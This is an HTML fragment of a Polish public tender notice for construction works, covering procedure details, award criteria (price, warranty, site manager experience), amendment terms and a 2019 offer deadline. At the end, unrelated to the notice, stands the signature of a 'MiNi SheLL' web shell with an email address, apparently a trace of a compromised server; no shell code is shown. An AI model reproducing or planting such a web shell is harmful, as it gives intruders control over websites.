style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres udzielonej gwarancji jakości na wykonane roboty budowlane</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>doświadczenie kierownika budowy</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zmiana umowy dokonana z naruszeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych podlega unieważnieniu. 2. Wszelkie zmiany i uzupełnienia treści niniejszejumowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności. 3. W przypadkach przewidzianych w umowie dopuszcza sięwprowadzenie zmian za zgodą Zamawiającego 4. Zmiany w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. 5. Zmiany umowy nie mogąwykraczać poza zakres świadczenia określony w Specyfikacji istotnych warunków zamówienia. 6. Zmiany umowy mogą dotyczyć: 1) zmiany jakości lub innych parametrówcharakterystycznych dla objętego proponowaną zmianą elementu robót budowlanych, 2) aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny, 3) zmianyproducenta materiałów, 4) zmiany wymiarów, położenia lub wysokości części robót budowlanych. 7. Jeżeli zmiana, o której mowa w ust. 6, wymaga zmiany lub wykonaniadokumentacji projektowej lub specyfikacji technicznych wykonania i odbioru robót,strona inicjująca przedstawia projekt zamienny lub wykonuje projekt zawierający opisproponowanych zmian wraz z informacją - o konieczności lub nie - zmiany zgłoszenia lub uzyskania pozwolenia na budowę oraz przedmiar i niezbędne rysunki. Projekt takiwymaga akceptacji projektanta i zatwierdzenia do realizacji przez Zamawiającego. 8. Warunkiem dokonania zmian o których mowa w ust. 6 jest złożenie wniosku przez stronęinicjującą zmianę zawierającego: 1) opis propozycji zmian 2) uzasadnienie zmiany 3) opis wpływu zmian na termin wykonania umowy 9. Zmiany, o których mowa w ust. 6mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej wymienione okoliczności: 1) poprawa wartości lub podniesienie sprawności ukończonych robót budowlanych; 2)zmiana obowiązujących przepisów; 3) podniesienie trwałości obiektu; 4) podniesienie bezpieczeństwa wykonywanie robót; 5) opóźnienia, utrudnienia, zawieszenia robót lubprzeszkody spowodowane przez lub dające się przypisać Zamawiającemu; 6) zaistnienia nieprzewidzianych w umowie warunków geologicznych, hydrogeologicznych,wykopalisk, wyjątkowo niekorzystnych warunków klimatycznych, a także innych przeszkód lub skażeń uniemożliwiających kontynuowanie umowy na przewidzianych w niejwarunkach; 7) siła wyższa. 10. Przewiduje się również możliwość zmiany terminu realizacji przedmiotu umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-10-15</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com